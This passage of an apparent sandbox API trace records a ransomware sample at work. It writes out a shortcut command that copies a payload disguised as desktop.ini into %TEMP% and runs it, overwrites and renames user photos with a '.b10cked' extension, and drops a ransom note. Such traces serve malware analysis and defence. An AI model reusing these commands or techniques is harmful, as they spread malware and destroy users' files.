out: lpWideCharStr="\x57\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0145.814] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x69\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0145.814] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x74\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0145.815] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x47\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0145.815] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x61\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0145.815] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6e\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0145.815] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0145.815] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0145.815] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0145.815] CharUpperBuffW (in: lpsz="explorer.exe \"lr0aR2rEWELj\" & type \"lr0aR2rEWELj\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && 
\"%TEMP%\\[EXE_NAME]\"", cchLength=0x69 | out: lpsz="EXPLORER.EXE \"LR0AR2REWELJ\" & TYPE \"LR0AR2REWELJ\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x69 [0145.815] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0145.815] CharUpperBuffW (in: lpsz="explorer.exe \"lr0aR2rEWELj\" & type \"lr0aR2rEWELj\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x6a | out: lpsz="EXPLORER.EXE \"LR0AR2REWELJ\" & TYPE \"LR0AR2REWELJ\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x6a [0145.815] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0145.815] CoInitialize (pvReserved=0x0) returned 0x0 [0145.815] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0145.816] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0145.816] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0145.816] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0145.818] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"lr0aR2rEWELj\" & type \"lr0aR2rEWELj\\desktop.ini\" > \"%TEMP%\\xwWitGan.exe\" && 
\"%TEMP%\\xwWitGan.exe\"") returned 0x0 [0145.818] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0145.818] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0145.818] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0145.818] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj.lnk", fRemember=0) returned 0x0 [0145.826] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0145.826] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0145.826] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0145.826] CoUninitialize () [0145.826] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0145.826] ReleaseMutex (hMutex=0xf8) returned 1 [0145.826] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0145.827] ReleaseMutex (hMutex=0xf8) returned 1 [0145.827] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0145.827] ReleaseMutex (hMutex=0xf8) returned 1 [0145.827] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0145.827] ReleaseMutex (hMutex=0xf8) returned 1 [0145.827] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\wo_IX7FkjtTmLgs.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\wo_ix7fkjttmlgs.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0145.827] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.827] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11e61 [0145.827] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.827] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=20261667319) returned 1 [0145.828] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.828] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11e61 [0145.828] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.828] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.828] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11e61 [0145.828] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.829] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0145.829] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x11e61 [0145.829] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0145.829] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.829] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11e61 [0145.829] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.830] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.830] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11e61 [0145.830] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.830] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.830] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11e61 [0145.830] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.830] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.830] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11e61 [0145.830] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.830] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.830] SetFilePointer (in: 
hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11e61 [0145.831] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.831] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.831] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11e61 [0145.831] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.831] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x11979 [0145.831] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0145.832] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0145.832] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0145.832] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x11e61 [0145.833] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0145.833] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, 
dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0145.833] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0145.833] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x11e61 [0145.833] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0145.833] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0145.833] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x8f2f, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x8f2f, lpOverlapped=0x0) returned 1 [0145.833] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0145.834] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x8f2f, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x8f2f, lpOverlapped=0x0) returned 1 [0145.834] SetFilePointer (in: hFile=0x114, lDistanceToMove=-36655, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x8f32 [0145.834] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x8f2f, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x8f2f, lpOverlapped=0x0) returned 1 [0145.834] SetFilePointer (in: hFile=0x114, lDistanceToMove=-36655, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x8f32 [0145.834] WriteFile (in: 
hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x8f2f, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x8f2f, lpOverlapped=0x0) returned 1 [0145.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="wo_IX7FkjtTmLgs.jpg", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0145.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="wo_IX7FkjtTmLgs.jpg", cchWideChar=19, lpMultiByteStr=0x13288fc, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wo_IX7FkjtTmLgs.jpg", lpUsedDefaultChar=0x0) returned 19 [0145.838] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x11e61 [0145.838] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0145.838] CloseHandle (hObject=0x114) returned 1 [0145.839] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\wo_IX7FkjtTmLgs.jpg", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\WO_IX7~1.JPG") returned 0x26 [0145.840] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\") returned 0x1a [0145.840] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\WO_IX7~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\wo_IX7FkjtTmLgs.jpg.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, 
lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\WO_IX7~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\wo_IX7FkjtTmLgs.jpg.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xaf4, dwThreadId=0xa74)) returned 1 [0145.841] CloseHandle (hObject=0x110) returned 1 [0145.841] CloseHandle (hObject=0x114) returned 1 [0145.841] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Pictures\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\PICTURES\\") returned 0x1a [0145.841] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\", cchLength=0x27 | out: lpsz="C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2REWELJ\\") returned 0x27 [0145.841] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\PICTURES\\", cchCount1=26, lpString2="C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2REWELJ\\", cchCount2=39) returned 1 [0145.841] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Pictures\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\PICTURES\\") returned 0x1a [0145.841] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0145.841] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\PICTURES\\", cchCount1=26, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0145.841] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0145.842] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > 
\"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0145.842] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0145.842] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\") returned 0x1a [0145.842] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0145.842] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0145.842] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Pictures\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Pictures\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0xb18, dwThreadId=0xa9c)) returned 1 [0145.843] CloseHandle (hObject=0x110) returned 1 [0145.843] CloseHandle (hObject=0x114) returned 1 [0145.843] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\pictures\\bl0cked-readme.rtf")) returned 0x20 [0145.843] CompareStringW 
(Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0145.843] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0145.844] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0145.844] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0145.844] ReleaseMutex (hMutex=0xf8) returned 1 [0145.844] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0145.844] ReleaseMutex (hMutex=0xf8) returned 1 [0145.844] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0145.844] ReleaseMutex (hMutex=0xf8) returned 1 [0145.844] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0145.844] ReleaseMutex (hMutex=0xf8) returned 1 [0145.844] CreateFileW (lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata" (normalized: "c:\\users\\all users\\adobe\\acrobat\\10.0\\replicate\\security\\directories.acrodata"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0145.844] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.844] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1df [0145.844] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.844] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=20263342853) returned 1 [0145.844] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 
dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.844] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1df [0145.844] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.844] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.844] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1df [0145.844] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.845] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0145.845] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x1df [0145.845] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: 